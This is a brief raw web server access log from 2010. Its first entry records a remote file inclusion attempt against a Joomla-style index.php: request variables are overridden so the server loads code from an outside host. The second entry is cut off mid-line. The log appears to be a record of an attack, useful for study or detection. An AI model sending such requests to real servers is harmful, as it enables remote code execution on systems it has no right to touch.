195.184.217.50 - - [11/Feb/2010:09:08:43 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:09:08:45 -0800] "GET /logs